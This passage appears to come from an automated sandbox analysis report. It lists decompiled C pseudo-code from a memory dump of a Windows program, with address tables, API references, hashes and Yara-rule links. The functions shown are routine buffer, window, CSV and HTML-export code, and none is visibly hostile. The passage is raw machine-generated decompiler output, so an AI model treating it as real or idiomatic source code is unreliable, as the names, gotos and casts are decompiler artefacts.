						memcpy(_v16, _a4, __ebx);
						memcpy(_a4, _t32, __ebx);
						_t20 = memcpy(_t32, _v16, __ebx);
						_a4 = _a4 + __ebx;
						_t32 = _t32 + _v8;
						_t34 = _t34 + 0x24;
						_v12 = _v12 + 1;
						_t28 = _t28 - 1;
					} while (_t28 > _v12);
				}
				_push(_v16);
				L0040E032();
				return _t20;
			}











                                                                                                                                                0x00409f23
                                                                                                                                                0x00409f29
                                                                                                                                                0x00409f30
                                                                                                                                                0x00409f31
                                                                                                                                                0x00409f32
                                                                                                                                                0x00409f3a
                                                                                                                                                0x00409f3d
                                                                                                                                                0x00409f3f
                                                                                                                                                0x00409f48
                                                                                                                                                0x00409f4b
                                                                                                                                                0x00409f4e
                                                                                                                                                0x00409f50
                                                                                                                                                0x00409f53
                                                                                                                                                0x00409f5a
                                                                                                                                                0x00409f64
                                                                                                                                                0x00409f6e
                                                                                                                                                0x00409f73
                                                                                                                                                0x00409f76
                                                                                                                                                0x00409f79
                                                                                                                                                0x00409f7c
                                                                                                                                                0x00409f7f
                                                                                                                                                0x00409f80
                                                                                                                                                0x00409f85
                                                                                                                                                0x00409f86
                                                                                                                                                0x00409f89
                                                                                                                                                0x00409f91

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$??2@??3@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1252195045-0
                                                                                                                                                • Opcode ID: 84cba42ff6f7e9e76cb5b3eb48464ce6a132065f142cfd3aba4b79740acf243f
                                                                                                                                                • Instruction ID: 9c944120e002927f8eec2413523e8dcd2a94c32319e751658ec61dd6637171fa
                                                                                                                                                • Opcode Fuzzy Hash: 84cba42ff6f7e9e76cb5b3eb48464ce6a132065f142cfd3aba4b79740acf243f
                                                                                                                                                • Instruction Fuzzy Hash: C0012172C00118BBDF106FAAD8819DEBFB9EF44394F10807AF808B6152D6755E559B98
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040768E, Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 76%
                                                                                                                                                			E0040768E(void* __esi) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t18;
				void* _t19;

				_t19 = __esi;
				_t9 =  *((intOrPtr*)(__esi + 0x38));
				if(_t9 != 0) {
					_push(_t9);
					L0040E032();
				}
				_t10 =  *((intOrPtr*)(_t19 + 0x48));
				if(_t10 != 0) {
					_push(_t10);
					L0040E032();
				}
				_t11 =  *((intOrPtr*)(_t19 + 0x2e4));
				if(_t11 != 0) {
					_push(_t11);
					L0040E032();
				}
				_t18 =  *((intOrPtr*)(_t19 + 0x2cc));
				if(_t18 != 0) {
					_t11 =  *_t18;
					if(_t11 != 0) {
						_push(_t11);
						L0040E032();
						 *_t18 = 0;
					}
					_push(_t18);
					L0040E032();
				}
				 *((intOrPtr*)(_t19 + 0x2cc)) = 0;
				 *((intOrPtr*)(_t19 + 0x38)) = 0;
				 *((intOrPtr*)(_t19 + 0x48)) = 0;
				 *((intOrPtr*)(_t19 + 0x2e4)) = 0;
				return _t11;
			}








                                                                                                                                                0x0040768e
                                                                                                                                                0x0040768e
                                                                                                                                                0x00407697
                                                                                                                                                0x00407699
                                                                                                                                                0x0040769a
                                                                                                                                                0x0040769f
                                                                                                                                                0x004076a0
                                                                                                                                                0x004076a5
                                                                                                                                                0x004076a7
                                                                                                                                                0x004076a8
                                                                                                                                                0x004076ad
                                                                                                                                                0x004076ae
                                                                                                                                                0x004076b6
                                                                                                                                                0x004076b8
                                                                                                                                                0x004076b9
                                                                                                                                                0x004076be
                                                                                                                                                0x004076bf
                                                                                                                                                0x004076c7
                                                                                                                                                0x004076c9
                                                                                                                                                0x004076cd
                                                                                                                                                0x004076cf
                                                                                                                                                0x004076d0
                                                                                                                                                0x004076d6
                                                                                                                                                0x004076d6
                                                                                                                                                0x004076d8
                                                                                                                                                0x004076d9
                                                                                                                                                0x004076de
                                                                                                                                                0x004076e0
                                                                                                                                                0x004076e6
                                                                                                                                                0x004076e9
                                                                                                                                                0x004076ec
                                                                                                                                                0x004076f3

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                • Opcode ID: ecba441bf80caf65155bf32042a5b6e7135137503112716ea17be55409703e0f
                                                                                                                                                • Instruction ID: 342c1f177218003cdd1623b0f4e7fc54ae999312f226978e8e9af0a1ecb46938
                                                                                                                                                • Opcode Fuzzy Hash: ecba441bf80caf65155bf32042a5b6e7135137503112716ea17be55409703e0f
                                                                                                                                                • Instruction Fuzzy Hash: F1F03C72949A515BC724AE6ED8C485BB3E9AB043647604C3FF14AE3690CA39BC904A1C
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00403054, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                			E00403054(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				void* __ebx;
				void* __esi;
				intOrPtr _t15;
				struct HDWP__* _t31;
				intOrPtr _t34;
				RECT* _t36;

				_push(__ecx);
				_t34 = __ecx;
				_v8 = __ecx;
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t15 = _a12;
							 *((intOrPtr*)(_t15 + 0x18)) = 0xc8;
							 *((intOrPtr*)(_t15 + 0x1c)) = 0x78;
						}
					} else {
						E00401810(__ecx + 0x40);
					}
				} else {
					_t31 = BeginDeferWindowPos(3);
					_t36 = _t34 + 0x40;
					E004017E9(_t36, _t31, 0x3f1, 0, 0, 1);
					E004017E9(_t36, _t31, 1, 1, 1, 0);
					E004017E9(_t36, _t31, 2, 1, 1, 0);
					EndDeferWindowPos(_t31);
					InvalidateRect( *(_t36 + 0x10), _t36, 1);
					_t34 = _v8;
				}
				return E004015CE(_t34, _a4, _a8, _a12);
			}










                                                                                                                                                0x00403057
                                                                                                                                                0x0040305e
                                                                                                                                                0x00403060
                                                                                                                                                0x00403063
                                                                                                                                                0x004030b9
                                                                                                                                                0x004030c9
                                                                                                                                                0x004030cb
                                                                                                                                                0x004030ce
                                                                                                                                                0x004030d5
                                                                                                                                                0x004030d5
                                                                                                                                                0x004030bb
                                                                                                                                                0x004030be
                                                                                                                                                0x004030be
                                                                                                                                                0x00403065
                                                                                                                                                0x00403076
                                                                                                                                                0x0040307d
                                                                                                                                                0x00403081
                                                                                                                                                0x0040308c
                                                                                                                                                0x00403098
                                                                                                                                                0x0040309e
                                                                                                                                                0x004030a9
                                                                                                                                                0x004030af
                                                                                                                                                0x004030b2
                                                                                                                                                0x004030ef

                                                                                                                                                APIs
                                                                                                                                                • BeginDeferWindowPos.USER32 ref: 00403068
                                                                                                                                                  • Part of subcall function 004017E9: GetDlgItem.USER32 ref: 004017F2
                                                                                                                                                • EndDeferWindowPos.USER32(00000000), ref: 0040309E
                                                                                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 004030A9
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DeferWindow$BeginInvalidateItemRect
                                                                                                                                                • String ID: $
                                                                                                                                                • API String ID: 4234876885-3993045852
                                                                                                                                                • Opcode ID: 9f95f7265a4407c1351ad9ebcb6b82dd225c6b4ae57057ea946bec00b32e7224
                                                                                                                                                • Instruction ID: 5bd367454bd051cdd9e75425df65f1b17fedc8d2c9609545a756db00ac89be97
                                                                                                                                                • Opcode Fuzzy Hash: 9f95f7265a4407c1351ad9ebcb6b82dd225c6b4ae57057ea946bec00b32e7224
                                                                                                                                                • Instruction Fuzzy Hash: 65119171140208FFEB215F51CCC5F6F3AACEB05799F10403AF5053A1D0D675AE459BA9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00409457, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 64%
                                                                                                                                                			E00409457(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				signed short _v516;
				void _v1026;
				signed short _v1028;
				void* __esi;
				void* _t17;
				intOrPtr* _t26;
				signed short* _t28;

				_v516 = _v516 & 0x00000000;
				_t26 = __ecx;
				memset( &_v514, 0, 0x1fc);
				_v1028 = _v1028 & 0x00000000;
				memset( &_v1026, 0, 0x1fc);
				_t17 =  *((intOrPtr*)( *_t26 + 0x24))();
				_t28 =  &_v516;
				E004086F5(_t28, _t17);
				_push(_t28);
				_push(L"</%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040DFD6();
				return E00408857(_t26, _t26, _a4,  &_v1028);
			}











                                                                                                                                                0x00409460
                                                                                                                                                0x00409479
                                                                                                                                                0x0040947b
                                                                                                                                                0x00409480
                                                                                                                                                0x00409492
                                                                                                                                                0x0040949e
                                                                                                                                                0x004094a2
                                                                                                                                                0x004094a8
                                                                                                                                                0x004094af
                                                                                                                                                0x004094b0
                                                                                                                                                0x004094bb
                                                                                                                                                0x004094c0
                                                                                                                                                0x004094c1
                                                                                                                                                0x004094dd

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040947B
                                                                                                                                                • memset.MSVCRT ref: 00409492
                                                                                                                                                  • Part of subcall function 004086F5: wcscpy.MSVCRT ref: 004086FA
                                                                                                                                                  • Part of subcall function 004086F5: _wcslwr.MSVCRT ref: 0040872D
                                                                                                                                                • _snwprintf.MSVCRT ref: 004094C1
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                • String ID: </%s>
                                                                                                                                                • API String ID: 3400436232-259020660
                                                                                                                                                • Opcode ID: 8ddce1f62360dacabf53b406146bfe6f6197350877303745630cb16e54be09f3
                                                                                                                                                • Instruction ID: 85b546f447cb05eec590fc4b387cecce4986b1e61cf39ba9e2c32341b3a77f5f
                                                                                                                                                • Opcode Fuzzy Hash: 8ddce1f62360dacabf53b406146bfe6f6197350877303745630cb16e54be09f3
                                                                                                                                                • Instruction Fuzzy Hash: AE0186B3E0012966D720BB55CC45FEA767CEF45318F0004BABB09F71C2DB789E558A98
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00406C43, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 77%
                                                                                                                                                			E00406C43(intOrPtr __ecx, void* __eflags, struct HWND__* _a4) {
				void _v8198;
				short _v8200;
				void* _t9;
				void* _t12;
				intOrPtr _t19;
				intOrPtr _t20;

				_t19 = __ecx;
				_t9 = E0040E340(0x2004, __ecx);
				_t20 = _t19;
				if(_t20 == 0) {
					_t20 =  *0x412ec8; // 0x0
				}
				_t25 =  *0x412c38;
				if( *0x412c38 != 0) {
					_v8200 = _v8200 & 0x00000000;
					memset( &_v8198, 0, 0x2000);
					_push(_t20);
					_t12 = 5;
					E00406CC6(_t12);
					if(E00406D72(_t19, _t25, L"caption",  &_v8200) != 0) {
						SetWindowTextW(_a4,  &_v8200);
					}
					return EnumChildWindows(_a4, E00406BAC, 0);
				}
				return _t9;
			}









                                                                                                                                                0x00406c43
                                                                                                                                                0x00406c4b
                                                                                                                                                0x00406c51
                                                                                                                                                0x00406c55
                                                                                                                                                0x00406c57
                                                                                                                                                0x00406c57
                                                                                                                                                0x00406c5d
                                                                                                                                                0x00406c65
                                                                                                                                                0x00406c67
                                                                                                                                                0x00406c7d
                                                                                                                                                0x00406c82
                                                                                                                                                0x00406c85
                                                                                                                                                0x00406c86
                                                                                                                                                0x00406ca1
                                                                                                                                                0x00406cad
                                                                                                                                                0x00406cad
                                                                                                                                                0x00000000
                                                                                                                                                0x00406cbd
                                                                                                                                                0x00406cc5

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                • String ID: caption
                                                                                                                                                • API String ID: 1523050162-4135340389
                                                                                                                                                • Opcode ID: d0d1c183662057111760d53cf79a0ccaff861f51f495aa9ed578fc316b6293da
                                                                                                                                                • Instruction ID: 29de1f336f9b1ad8a88558a0c2ea7e463315901b0f4d8a0f0fc28385d02cb639
                                                                                                                                                • Opcode Fuzzy Hash: d0d1c183662057111760d53cf79a0ccaff861f51f495aa9ed578fc316b6293da
                                                                                                                                                • Instruction Fuzzy Hash: 2DF0A472900314AAFB30AB55DD4AF8A3768DB04714F1100B6FA05B71D2D7B8ADA4CA9C
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00405954, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 58%
                                                                                                                                                			E00405954(struct HWND__* _a4) {
				void _v514;
				short _v516;
				signed int _t11;

				_v516 = _v516 & 0x00000000;
				memset( &_v514, 0, 0x1fe);
				GetClassNameW(_a4,  &_v516, 0xff);
				_t11 =  &_v516;
				_push(L"edit");
				_push(_t11);
				L0040E03E();
				asm("sbb eax, eax");
				return  ~_t11 + 1;
			}






                                                                                                                                                0x0040595d
                                                                                                                                                0x00405973
                                                                                                                                                0x0040598a
                                                                                                                                                0x00405990
                                                                                                                                                0x00405996
                                                                                                                                                0x0040599b
                                                                                                                                                0x0040599c
                                                                                                                                                0x004059a4
                                                                                                                                                0x004059a9

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ClassName_wcsicmpmemset
                                                                                                                                                • String ID: edit
                                                                                                                                                • API String ID: 2747424523-2167791130
                                                                                                                                                • Opcode ID: d96ffc2340dd17deb26b5e0e58a9f5fe458e458e5f66db96c8edd361173f025a
                                                                                                                                                • Instruction ID: 748b3c7a54d916a83871e5d55f64a5683e5b8dafeb1aa9d8bd9837731e8c37d4
                                                                                                                                                • Opcode Fuzzy Hash: d96ffc2340dd17deb26b5e0e58a9f5fe458e458e5f66db96c8edd361173f025a
                                                                                                                                                • Instruction Fuzzy Hash: D7E0927298031E6AEB20EBB0DC4AFA577ACAB04708F4006B5B914F10C2EAB4964A4A44
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040DA9D, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E0040DA9D() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;

				if( *0x413268 == 0) {
					_t1 = LoadLibraryW(L"shell32.dll");
					 *0x413268 = _t1;
					if(_t1 != 0) {
						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathW");
						 *0x413264 = _t2;
						return _t2;
					}
				}
				return _t1;
			}





                                                                                                                                                0x0040daa4
                                                                                                                                                0x0040daab
                                                                                                                                                0x0040dab3
                                                                                                                                                0x0040dab8
                                                                                                                                                0x0040dac0
                                                                                                                                                0x0040dac6
                                                                                                                                                0x00000000
                                                                                                                                                0x0040dac6
                                                                                                                                                0x0040dab8
                                                                                                                                                0x0040dacb

                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryW.KERNEL32(shell32.dll,0040BEBF,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 0040DAAB
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040DAC0
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                                                • API String ID: 2574300362-880857682
                                                                                                                                                • Opcode ID: afd27a41b0bfe2ea412867375fb9fe93228578f58e863494430a310e9e96df8a
                                                                                                                                                • Instruction ID: 122d2585c685c0691ad6c3d54d7046cb00117d102b384f1c3bcadfb2245e5d9f
                                                                                                                                                • Opcode Fuzzy Hash: afd27a41b0bfe2ea412867375fb9fe93228578f58e863494430a310e9e96df8a
                                                                                                                                                • Instruction Fuzzy Hash: 5ED0C9F0A59300AAD720AF65AE097923AA4AB40713F149576E804F12B0D7B881C8CE6C
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00408885, Relevance: 6.1, APIs: 4, Instructions: 121COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 75%
                                                                                                                                                			E00408885(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				wchar_t* _v36;
				void* __edi;
				signed int _t39;
				wchar_t* _t41;
				signed int _t45;
				signed int _t48;
				wchar_t* _t53;
				wchar_t* _t62;
				wchar_t* _t63;
				wchar_t* _t64;
				void* _t68;
				void* _t69;
				intOrPtr* _t71;
				wchar_t* _t79;
				wchar_t* _t83;

				_t68 = __ebx;
				_t79 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(__ebx + 0x34)) > 0) {
					do {
						_t39 =  *( *((intOrPtr*)(_t68 + 0x38)) + _v8 * 4);
						_t71 = _a8;
						if(_t71 != _t79) {
							_t83 =  *((intOrPtr*)( *_t71))(_t39,  *((intOrPtr*)(_t68 + 0x68)));
						} else {
							_t83 =  *( *((intOrPtr*)(_t68 + 0x2e4)) + 0x10 + _t39 * 0x14);
						}
						_t41 = wcschr(_t83, 0x2c);
						_pop(_t69);
						if(_t41 != 0) {
							L10:
							_v36 = _t79;
							_v32 = _t79;
							_v28 = _t79;
							_v20 = 0x100;
							_v24 = 1;
							_v16 = 0x22;
							E004063DD( &_v16 | 0xffffffff, _t69,  &_v36, __eflags,  &_v16);
							while(1) {
								_t45 =  *_t83 & 0x0000ffff;
								__eflags = _t45;
								_v12 = _t45;
								_t81 =  &_v36;
								if(__eflags == 0) {
									break;
								}
								__eflags = _t45 - 0x22;
								if(__eflags != 0) {
									_push( &_v12);
									_t48 = 1;
									__eflags = 1;
								} else {
									_push(L"\"\"");
									_t48 = _t45 | 0xffffffff;
								}
								E004063DD(_t48, _t69, _t81, __eflags);
								_t83 =  &(_t83[0]);
								__eflags = _t83;
							}
							E004063DD( &_v16 | 0xffffffff, _t69,  &_v36, __eflags,  &_v16);
							_t53 = _v36;
							__eflags = _t53;
							if(_t53 == 0) {
								_t53 = 0x40f454;
							}
							E00408857(_t68, _t69, _a4, _t53);
							E00406355( &_v36);
							_t79 = 0;
							__eflags = 0;
						} else {
							_t62 = wcschr(_t83, 0x22);
							_pop(_t69);
							if(_t62 != 0) {
								goto L10;
							} else {
								_t63 = wcschr(_t83, 0xd);
								_pop(_t69);
								if(_t63 != 0) {
									goto L10;
								} else {
									_t64 = wcschr(_t83, 0xa);
									_pop(_t69);
									if(_t64 != 0) {
										goto L10;
									} else {
										E00408857(_t68, _t69, _a4, _t83);
									}
								}
							}
						}
						if(_v8 <  *((intOrPtr*)(_t68 + 0x34)) - 1) {
							E00408857(_t68, _t69, _a4, ",");
						}
						_v8 = _v8 + 1;
					} while (_v8 <  *((intOrPtr*)(_t68 + 0x34)));
				}
				return E00408857(_t68, _t69, _a4, L"\r\n");
			}

























                                                                                                                                                0x00408885
                                                                                                                                                0x0040888c
                                                                                                                                                0x00408891
                                                                                                                                                0x00408894
                                                                                                                                                0x0040889b
                                                                                                                                                0x004088a1
                                                                                                                                                0x004088a4
                                                                                                                                                0x004088a9
                                                                                                                                                0x004088c2
                                                                                                                                                0x004088ab
                                                                                                                                                0x004088b4
                                                                                                                                                0x004088b4
                                                                                                                                                0x004088c7
                                                                                                                                                0x004088cf
                                                                                                                                                0x004088d0
                                                                                                                                                0x0040890c
                                                                                                                                                0x0040890f
                                                                                                                                                0x00408912
                                                                                                                                                0x00408915
                                                                                                                                                0x0040891f
                                                                                                                                                0x00408926
                                                                                                                                                0x0040892d
                                                                                                                                                0x00408934
                                                                                                                                                0x00408959
                                                                                                                                                0x00408959
                                                                                                                                                0x0040895c
                                                                                                                                                0x0040895f
                                                                                                                                                0x00408962
                                                                                                                                                0x00408965
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040893b
                                                                                                                                                0x0040893f
                                                                                                                                                0x0040894e
                                                                                                                                                0x00408951
                                                                                                                                                0x00408951
                                                                                                                                                0x00408941
                                                                                                                                                0x00408941
                                                                                                                                                0x00408946
                                                                                                                                                0x00408946
                                                                                                                                                0x00408952
                                                                                                                                                0x00408958
                                                                                                                                                0x00408958
                                                                                                                                                0x00408958
                                                                                                                                                0x0040896e
                                                                                                                                                0x00408973
                                                                                                                                                0x00408976
                                                                                                                                                0x00408978
                                                                                                                                                0x0040897a
                                                                                                                                                0x0040897a
                                                                                                                                                0x00408985
                                                                                                                                                0x0040898d
                                                                                                                                                0x00408992
                                                                                                                                                0x00408992
                                                                                                                                                0x004088d2
                                                                                                                                                0x004088d5
                                                                                                                                                0x004088dd
                                                                                                                                                0x004088de
                                                                                                                                                0x00000000
                                                                                                                                                0x004088e0
                                                                                                                                                0x004088e3
                                                                                                                                                0x004088eb
                                                                                                                                                0x004088ec
                                                                                                                                                0x00000000
                                                                                                                                                0x004088ee
                                                                                                                                                0x004088f1
                                                                                                                                                0x004088f9
                                                                                                                                                0x004088fa
                                                                                                                                                0x00000000
                                                                                                                                                0x004088fc
                                                                                                                                                0x00408902
                                                                                                                                                0x00408902
                                                                                                                                                0x004088fa
                                                                                                                                                0x004088ec
                                                                                                                                                0x004088de
                                                                                                                                                0x0040899b
                                                                                                                                                0x004089a7
                                                                                                                                                0x004089a7
                                                                                                                                                0x004089ac
                                                                                                                                                0x004089b2
                                                                                                                                                0x004089bb
                                                                                                                                                0x004089cd

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: wcschr$memcpywcslen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1983396471-0
                                                                                                                                                • Opcode ID: 756c7a8378e56e10f3d760d0e98006f26f38834ae28c740255de16beb5e598db
                                                                                                                                                • Instruction ID: 891d09ae9378dccf635ba886e12c54397b7589aa880eb7d9b0c0a307a2786e7e
                                                                                                                                                • Opcode Fuzzy Hash: 756c7a8378e56e10f3d760d0e98006f26f38834ae28c740255de16beb5e598db
                                                                                                                                                • Instruction Fuzzy Hash: 5B41B431900214ABDF10FEA5C941AAE7BB8EF04328F50853FF891F72C2DB7899458A59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040A084, Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 92%
                                                                                                                                                			E0040A084(void* __eax, void* __eflags, wchar_t* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				signed int _t57;
				signed int _t58;
				intOrPtr _t60;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr _t67;
				signed int _t71;
				void* _t76;
				signed int _t80;
				wchar_t* _t91;
				void* _t92;
				void* _t94;
				void* _t95;

				_t76 = __eax;
				E00407A66(__eax, __eflags);
				_v12 = 0;
				_t57 = 0;
				while(1) {
					_t91 = _a4;
					if(( *(_t91 + _t57 * 2) & 0x0000ffff) + 0xffffffd0 > 9) {
						break;
					}
					_t57 = _t57 + 1;
					if(_t57 < 1) {
						continue;
					}
					_t71 = wcslen(_t91);
					if(_t71 >= 3) {
						break;
					}
					_push(_t91);
					L0040E062();
					if(_t71 >= 0 && _t71 <  *((intOrPtr*)(_t76 + 0x34))) {
						_v12 =  *((intOrPtr*)( *( *((intOrPtr*)(_t76 + 0x38)) + _t71 * 4) * 0x14 +  *((intOrPtr*)(_t76 + 0x2e4))));
					}
					L19:
					if(_a8 != 0) {
						_v12 = _v12 | 0x00001000;
					}
					_t80 =  *0x4131d4; // 0x1
					_t58 = _v12;
					 *0x4131d4 =  *0x4131d4 + 1;
					 *((intOrPtr*)(0x4131d8 + _t80 * 4)) = _t58;
					return _t58;
				}
				__eflags =  *((intOrPtr*)(_t76 + 0x2e0));
				_v16 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t76 + 0x2e0)) <= 0) {
					L14:
					_t92 = 0;
					__eflags =  *((intOrPtr*)(_t76 + 0x2e0));
					_v8 = 0;
					if( *((intOrPtr*)(_t76 + 0x2e0)) <= 0) {
						goto L19;
					} else {
						goto L15;
					}
					do {
						L15:
						_t60 = E0040546C( *((intOrPtr*)(_t92 +  *((intOrPtr*)(_t76 + 0x2e4)) + 0x10)), _a4);
						_t62 = E0040546C( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x48)) + _t92 + 0x10)), _a4);
